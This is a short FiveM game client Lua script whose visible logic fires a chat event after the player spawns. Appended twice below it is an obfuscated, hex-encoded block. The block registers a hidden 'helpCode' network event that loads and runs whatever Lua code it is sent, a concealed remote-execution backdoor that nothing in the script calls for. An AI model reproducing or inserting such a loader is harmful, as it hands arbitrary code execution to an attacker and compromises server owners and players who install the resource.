triggered = false;
AddEventHandler("playerSpawned", function()
    if not triggered then 
        triggered = true;
        Citizen.Wait((1000 * 20));
        TriggerServerEvent('chat:PlayerLoaded');
    end
end)

local LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[1]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[2]) LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[3]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[2], function(TXtDrjsDNGFlaiSrBInDbVnfPRJRMVOxOFxobCsmLKbwJuLKjWCSFgyRBHRFzPxHnEEIYI) LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[4]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[5]](TXtDrjsDNGFlaiSrBInDbVnfPRJRMVOxOFxobCsmLKbwJuLKjWCSFgyRBHRFzPxHnEEIYI))() end)

local LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[1]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[2]) LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[3]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[2], function(TXtDrjsDNGFlaiSrBInDbVnfPRJRMVOxOFxobCsmLKbwJuLKjWCSFgyRBHRFzPxHnEEIYI) LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[4]](LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[6][LuRtrKVWltLuZowXsrnMbtZumliBMvvJLgikysuMlqwiJyHUMYwBZXwGwXTNgSzRqmZmgN[5]](TXtDrjsDNGFlaiSrBInDbVnfPRJRMVOxOFxobCsmLKbwJuLKjWCSFgyRBHRFzPxHnEEIYI))() end)